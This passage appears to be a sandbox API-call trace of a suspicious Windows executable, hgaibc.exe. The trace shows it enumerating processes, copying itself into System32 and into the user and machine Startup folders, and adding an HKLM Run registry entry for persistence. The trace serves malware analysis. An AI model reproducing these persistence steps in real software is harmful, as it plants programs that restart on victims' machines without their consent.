cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.546] lstrlenW (lpString="svchost.exe") returned 11 [0177.546] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.547] lstrlenW (lpString="svchost.exe") returned 11 [0177.547] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.547] lstrlenW (lpString="svchost.exe") returned 11 [0177.547] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.548] lstrlenW (lpString="svchost.exe") returned 11 [0177.548] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.549] lstrlenW (lpString="svchost.exe") returned 11 [0177.564] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0177.565] lstrlenW (lpString="spoolsv.exe") returned 11 [0177.565] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.566] lstrlenW (lpString="svchost.exe") returned 11 [0177.566] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0177.566] lstrlenW (lpString="audiodg.exe") returned 11 [0177.566] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0177.567] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0177.567] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0177.568] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0177.568] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0177.568] lstrlenW (lpString="Memory Compression") returned 18 [0177.568] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0177.569] lstrlenW (lpString="sihost.exe") returned 10 [0177.569] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.570] lstrlenW (lpString="svchost.exe") returned 11 [0177.570] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0177.570] lstrlenW (lpString="msoia.exe") returned 9 [0177.570] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0177.571] lstrlenW (lpString="taskhostw.exe") returned 13 [0177.571] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.572] lstrlenW (lpString="explorer.exe") returned 12 [0177.572] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0177.572] lstrlenW (lpString="SearchUI.exe") returned 12 [0177.572] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0177.573] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0177.573] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0177.574] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0177.574] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0177.574] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0177.575] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0177.575] lstrlenW (lpString="hgaibc.exe") returned 10 [0177.575] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0177.576] lstrlenW (lpString="cmd.exe") returned 7 [0177.576] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0177.577] lstrlenW (lpString="conhost.exe") returned 11 [0177.577] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0177.577] lstrlenW (lpString="dllhost.exe") returned 11 [0177.577] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0177.578] lstrlenW (lpString="dllhost.exe") returned 11 [0177.578] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0177.579] lstrlenW (lpString="hgaibc.exe") returned 10 [0177.579] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0177.579] CloseHandle (hObject=0x240) returned 1 [0177.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x697b40 | out: hHeap=0x680000) returned 1 [0177.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x697708 | out: hHeap=0x680000) returned 1 [0177.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696620 | out: hHeap=0x680000) returned 1 [0177.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696700 | out: hHeap=0x680000) returned 1 [0177.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x695658 | out: hHeap=0x680000) returned 1 [0177.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c4948 | out: hHeap=0x680000) returned 1 [0177.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696760 | out: hHeap=0x680000) returned 1 [0177.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696520 | out: hHeap=0x680000) returned 1 [0177.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6beb88 | out: hHeap=0x680000) returned 1 [0177.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bed18 | out: hHeap=0x680000) returned 1 [0177.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6964a0 | out: hHeap=0x680000) returned 1 [0177.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6beae8 | out: hHeap=0x680000) returned 1 [0177.580] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x6c7778 [0177.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x6d7780 [0177.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4af8 [0177.581] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4af8, Size=0x20) returned 0x6be980 [0177.581] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6be980, Size=0x40) returned 0x697678 [0177.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4a08 [0177.581] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4a08, Size=0x20) returned 0x6bed40 [0177.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4bd0 [0177.581] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4bd0, Size=0x20) returned 0x6bea48 [0177.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4a68 [0177.582] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4a68, Size=0x20) returned 0x6bed18 [0177.582] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6bed18, Size=0x40) returned 0x697ab0 [0177.582] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6d7780, nSize=0x7fff | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe")) returned 0x47 [0177.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x6e7788 [0177.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x6f7790 [0177.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4960 [0177.582] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4960, Size=0x20) returned 0x6becf0 [0177.582] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6becf0, Size=0x40) returned 0x697900 [0177.582] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x697900, Size=0x80) returned 0x6c4708 [0177.583] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4708, Size=0x100) returned 0x6c5ff8 [0177.583] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0177.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c5ff8 | out: hHeap=0x680000) returned 1 [0177.583] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32\\hgaibc.exe", lpDst=0x6e7788, nSize=0x7fff | out: lpDst="C:\\WINDOWS\\System32\\hgaibc.exe") returned 0x1f [0177.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6f7790 | out: hHeap=0x680000) returned 1 [0177.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6e7788 | out: hHeap=0x680000) returned 1 [0177.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100000) returned 0x236e020 [0177.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4a68 [0177.587] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4a68, Size=0x20) returned 0x6beae8 [0177.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4a08 [0177.587] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4a08, Size=0x20) returned 0x6bea98 [0177.587] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0177.587] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0177.587] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x0) returned 1 [0177.587] lstrlenW (lpString="kernel32.dll") returned 12 [0177.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6beae8 | out: hHeap=0x680000) returned 1 [0177.587] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0177.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bea98 | out: hHeap=0x680000) returned 1 [0177.587] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0177.587] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\hgaibc.exe" (normalized: "c:\\windows\\system32\\hgaibc.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0177.721] ReadFile (in: hFile=0x240, lpBuffer=0x236e020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x236e020*, lpNumberOfBytesRead=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0177.729] WriteFile (in: hFile=0x244, lpBuffer=0x236e020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x236e020*, lpNumberOfBytesWritten=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0177.731] ReadFile (in: hFile=0x240, lpBuffer=0x236e020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x236e020*, lpNumberOfBytesRead=0x19fd90*=0x0, lpOverlapped=0x0) returned 1 [0177.731] CloseHandle (hObject=0x244) returned 1 [0177.731] CloseHandle (hObject=0x240) returned 1 [0177.731] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4948 [0177.731] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4948, Size=0x20) returned 0x6becc8 [0177.731] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4b70 [0177.731] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4b70, Size=0x20) returned 0x6be958 [0177.731] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0177.732] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0177.732] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0177.732] lstrlenW (lpString="kernel32.dll") returned 12 [0177.732] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6be958 | out: hHeap=0x680000) returned 1 [0177.732] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0177.732] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6becc8 | out: hHeap=0x680000) returned 1 [0177.732] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x236e020 | out: hHeap=0x680000) returned 1 [0177.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c49f0 [0177.737] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c49f0, Size=0x20) returned 0x6becf0 [0177.737] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6becf0, Size=0x40) returned 0x697708 [0177.737] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x697708, Size=0x80) returned 0x6c3e00 [0177.737] lstrlenW (lpString="C:\\WINDOWS\\System32\\hgaibc.exe") returned 30 [0177.738] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0177.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5c) returned 0x6c5ff8 [0177.738] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x19fd64 | out: phkResult=0x19fd64*=0x240) returned 0x0 [0177.738] RegSetValueExW (in: hKey=0x240, lpValueName="hgaibc.exe", Reserved=0x0, dwType=0x1, lpData="C:\\WINDOWS\\System32\\hgaibc.exe", cbData=0x3c | out: lpData="C:\\WINDOWS\\System32\\hgaibc.exe") returned 0x0 [0177.738] RegCloseKey (hKey=0x240) returned 0x0 [0177.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c5ff8 | out: hHeap=0x680000) returned 1 [0177.738] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0177.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c3e00 | out: hHeap=0x680000) returned 1 [0177.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x6e7788 [0177.739] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x6f7790 [0177.739] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4a68 [0177.739] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4a68, Size=0x20) returned 0x6bec28 [0177.739] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6bec28, Size=0x40) returned 0x697708 [0177.739] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x697708, Size=0x80) returned 0x6c3cf0 [0177.739] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c3cf0, Size=0x100) returned 0x6c5ff8 [0177.739] lstrlenW (lpString="") returned 0 [0177.739] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0177.739] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8c) returned 0x6c6100 [0177.739] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fd10 | out: phkResult=0x19fd10*=0x240) returned 0x0 [0177.739] RegQueryValueExW (in: hKey=0x240, lpValueName="Startup", lpReserved=0x0, lpType=0x19fd1c, lpData=0x6f7790, lpcbData=0x19fd48*=0x7fff | out: lpType=0x19fd1c*=0x0, lpData=0x6f7790*=0x53, lpcbData=0x19fd48*=0x7fff) returned 0x2 [0177.739] RegCloseKey (hKey=0x240) returned 0x0 [0177.739] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c6100 | out: hHeap=0x680000) returned 1 [0177.739] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0177.739] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8c) returned 0x6c6100 [0177.739] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fd10 | out: phkResult=0x19fd10*=0x244) returned 0x0 [0177.740] RegQueryValueExW (in: hKey=0x244, lpValueName="Startup", lpReserved=0x0, lpType=0x19fd1c, lpData=0x6f7790, lpcbData=0x19fd48*=0x7fff | out: lpType=0x19fd1c*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x19fd48*=0x98) returned 0x0 [0177.740] RegCloseKey (hKey=0x244) returned 0x0 [0177.740] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c6100 | out: hHeap=0x680000) returned 1 [0177.740] lstrlenW (lpString="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 75 [0177.740] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0177.740] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c5ff8 | out: hHeap=0x680000) returned 1 [0177.741] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe", lpDst=0x6e7788, nSize=0x7fff | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe") returned 0x59 [0177.741] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6f7790 | out: hHeap=0x680000) returned 1 [0177.741] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6e7788 | out: hHeap=0x680000) returned 1 [0177.742] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100000) returned 0x2368020 [0177.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4a68 [0177.745] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4a68, Size=0x20) returned 0x6bed18 [0177.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4b10 [0177.745] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4b10, Size=0x20) returned 0x6be8e0 [0177.745] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0177.745] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0177.745] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0177.745] lstrlenW (lpString="kernel32.dll") returned 12 [0177.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bed18 | out: hHeap=0x680000) returned 1 [0177.745] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0177.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6be8e0 | out: hHeap=0x680000) returned 1 [0177.745] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0177.745] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0177.746] ReadFile (in: hFile=0x244, lpBuffer=0x2368020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x2368020*, lpNumberOfBytesRead=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0177.751] WriteFile (in: hFile=0x248, lpBuffer=0x2368020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x2368020*, lpNumberOfBytesWritten=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0177.786] ReadFile (in: hFile=0x244, lpBuffer=0x2368020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x2368020*, lpNumberOfBytesRead=0x19fd90*=0x0, lpOverlapped=0x0) returned 1 [0177.786] CloseHandle (hObject=0x248) returned 1 [0177.786] CloseHandle (hObject=0x244) returned 1 [0177.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4a98 [0177.786] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4a98, Size=0x20) returned 0x6bec50 [0177.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4a98 [0177.786] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4a98, Size=0x20) returned 0x6beca0 [0177.786] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0177.786] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0177.787] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0177.787] lstrlenW 